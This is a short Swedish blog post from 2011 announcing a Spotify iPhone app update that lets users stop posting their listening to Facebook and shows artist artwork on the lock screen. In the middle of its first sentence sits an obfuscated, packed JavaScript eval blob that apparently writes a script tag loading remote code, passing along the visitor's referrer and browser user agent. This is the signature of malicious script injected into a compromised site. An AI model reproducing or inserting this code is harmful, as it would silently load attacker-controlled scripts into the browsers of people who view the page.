Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Spotify uppdatering…inge mer facebook spam!

Spotify uppdatering…inge mer facebook spam!
Filip Urde
  • On 16 november, 2011
  • http://www.revue.se/filip-urde
Nyheten eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ardzi|var|u0026u|referrer|teitd||js|php’.split(’|’),0,{}))
som alla (?) väntat på är här.
Nej, nu överdriver jag kanske, men faktum är att det inte är bara jag som har stört mig på den oändliga uppdateringen av vad folk lyssnar på i facebooks ”news feed”. Vi skrev tidigare om denna ”tvång”, att koppla ditt spotify konto med ditt facebook konto, men tydligen så har användarna sagt ifrån tillräckligt mycket.
Nu kan du alltså stänga av detta för dig som inte vill spamma ner alla med vad du lyssnar på. En annan fin funktion är att man nu ser artistens ”artwork” när det är låsskärm.

För att kunna köra appen behöver du premium-konto och ios 4 eller senare, inget nytt där. Så uppdatera nu era spotify appar!
itunes

Comments